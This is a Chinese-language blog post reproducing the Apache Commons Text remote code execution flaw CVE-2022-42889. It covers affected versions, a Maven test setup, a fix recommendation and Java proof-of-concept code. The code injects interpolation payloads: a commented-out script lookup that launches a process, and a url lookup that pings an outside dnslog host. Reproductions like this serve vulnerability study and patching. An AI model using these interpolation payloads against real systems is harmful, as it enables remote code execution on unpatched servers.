CVE-2022-42889 Apache Commons Text远程代码执行漏洞复现
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
Apache Commons是Apache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。
0x03 漏洞概述:
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
0x04 影响版本:
1.5 <= Apache Commons Text 版本<= 1.9
0x05 环境搭建:
通过Maven导入jar包。
<dependencies>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-configuration2</artifactId>
            <version>2.7</version>
        </dependency>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-text</artifactId>
            <version>1.9</version>
        </dependency>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-lang3</artifactId>
            <version>3.12.0</version>
        </dependency>
    </dependencies> 
0x06 漏洞复现:
代码:
package org.example;
import org.apache.commons.text.StringSubstitutor;
public class Main {
    public static void main(String[] args) {
        StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
//        String payload = interpolator.replace("${script:js:new java.lang.ProcessBuilder("calc").start()}");
        String payload = interpolator.replace("${url:utf-8:http://owncjx.dnslog.cn}");
        interpolator.replace(payload);
    }
} 
命令执行:
DNSlog外带查询:
0x07 修复建议:
目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。
下载链接:
0x08 参考文档:
https://www.cnblogs.com/wh4am1/p/16795499.html
上一篇:
			            Java架构师技术进阶路线图 
			          
			          下一篇:
			            计算机网络基本设备及网络拓扑图 
			          
			        
